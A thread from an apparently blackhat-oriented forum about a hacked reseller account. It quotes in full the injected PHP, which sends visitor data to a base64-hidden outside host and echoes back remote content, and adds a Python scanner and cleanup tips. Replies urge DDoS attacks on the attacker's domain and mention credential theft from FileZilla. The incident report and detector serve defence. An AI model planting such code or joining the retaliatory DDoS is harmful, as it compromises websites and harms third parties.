Best Blackhat Forum

Full Version: SITE HACK WARNING !! - please read
Hi,

Some of you know of me and the bits I do trying to keep things clean etc.
As such, I'm quite happy to say my sites are strong and secure - good passwords, all the usual stuff.
Some sites are WP, minimal plugins and themes, all clean as you'd expect.
the main sites are hand coded php, so very unlikely...

To my shock, more anger... I've just noticed that all my accounts in my reseller account have been hacked..
All the index pages have been tampered with - all timestamped the same day, a few days ago.
The code is a crappy content fetch made to look like stats code.
Visiting the tosser domain redirects to some bots vs browser site.

public code viewing and viewing as search engine show no delivered payload...

the inserted code is:
Code:
<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'yahoo') == false) && (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false) && (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false) && (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false) && (strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create  bot analitics
            $stCurlLink = base64_decode('aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']) . '&useragent=' . urlencode($sUserAgent) . '&domainname=' . urlencode($_SERVER['HTTP_HOST']) . '&fullpath=' . urlencode($_SERVER['REQUEST_URI']) . '&check=' . isset($_GET['look']);
            @$stCurlHandle = curl_init($stCurlLink);
        }
    }
    if ($stCurlHandle !== NULL)
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0] == "O")
        {
            $sResult[0] = " ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

this points to some tosser here:
Code:
http://mbrowserstats.com/statH/stat.php

whois gives some pointless info, but I will chase it anyway
Code:
http://whois.domaintools.com/mbrowserstats.com
if anyone fancies DDOS'ing that D***H*** into oblivion.. feel free

My Host is being slightly less than useless right now, thankfully I don't need their help, just an indication of how they got in

you'll see this attack widely reported on the net, starting from feb this year, when the domain was registered...

checking your source by viewing via browser etc will not help - you need to check for unexpected changes by ftp browsing.
quick update - if you do have this crap on your site...

- Check and clean all index files

When cleaning a WP site
- Check and clean all index files
- in themes, also check and clean footer.php and page.php files

It seems to be from some crappy crawler bot as the pattern is quite precise.

Si
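A small scanner for the marker pattern of this injection, added here as an example (not code from the thread or from any tool it mentions): it walks a document root, flags PHP files carrying the $sRetry / base64_decode / curl_init / HTTP_USER_AGENT combination, decodes the base64-hidden call-home URL, and reports each hit with its modification day so a same-day cluster like the one described above stands out. The sample files and paths written by demo() are constructed for the demonstration.

```python
import base64
import os
import re
import tempfile
from datetime import datetime, timezone

# Traits of the injection quoted above: $sRetry guard, base64-hidden URL fed to curl_init(), UA bot filter.
MARKERS = ("$sRetry", "base64_decode(", "curl_init(", "HTTP_USER_AGENT")
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decoded_urls(source):
    """Decode every base64_decode('...') literal in source and keep the ones that are URLs."""
    urls = []
    for blob in B64_CALL.findall(source):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: bad padding or alphabet
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def is_infected(source):
    """All four markers together are the signature; any one alone is common in clean code."""
    return all(marker in source for marker in MARKERS)


def scan(root):
    """Return (relative path, mtime day in UTC, decoded URLs) for each infected .php file under root."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if is_infected(src):
                day = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc).date().isoformat()
                hits.append((os.path.relpath(path, root), day, decoded_urls(src)))
    return hits


def demo():
    """Constructed sample (hypothetical files): an injected index.php beside a clean footer.php."""
    injected = ("<?php if (!isset($sRetry)) { $sRetry = 1; $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);"
                " curl_init(base64_decode('aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw')); } ?>")
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", injected + "<p>home</p>"), ("footer.php", "<?php wp_footer(); ?>")):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return scan(root)  # expected: one hit, index.php, decoding to the stat.php URL
```

Run scan() against a local FTP mirror of each account rather than over HTTP, since the injected code shows nothing to a browser or a crawler.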
The dirty little defacing skid cunts.
I have sent you a PM about some DDOS fun.
Thanks for this, I've been noticing some odd crawlers recently on my site as well, but I've installed a plugin that helps me in blocking tons of IPs and other things based on rules I set, and if they break them they're automatically banned for 1 week and I get notified.
Thanks a lot for sharing this info mate.. Thanks..
Thanks for letting us know, I will be reviewing my sites for this from now on.
Quick update...
Quite odd, it seems the attack may have been linked in some way to filezilla ftp I have on this machine.

My machine is clean, - very clean - I check often with a variety of tools.
I need this machine daily, too much to risk crappy downloads on.. so I never run windows programs etc that I've 'obtained' on this machine; it's kept in a clean and safe state. Saying that, I never download windows stuff, only php and embedded source etc.

The reason I'm pointing the finger is that all of the accounts - exactly - on the filezilla ftp on this machine are the ones that got hit.
There are several others that got totally missed, too many to be chance, as it's an exact match to the 20+ accounts on this software.

hmmm...

Si
Weird, is there any other commonality between the sites? Might it be the host that got hacked?
Luckily this did not happen to me.

Thanks for the heads up!
@simey69
Seems you caught a trojan that looked especially for the filezilla server manager XML file...

It contains all ftp account data in clear text (no encryption for passwords here :-(

Cheers, Johnny63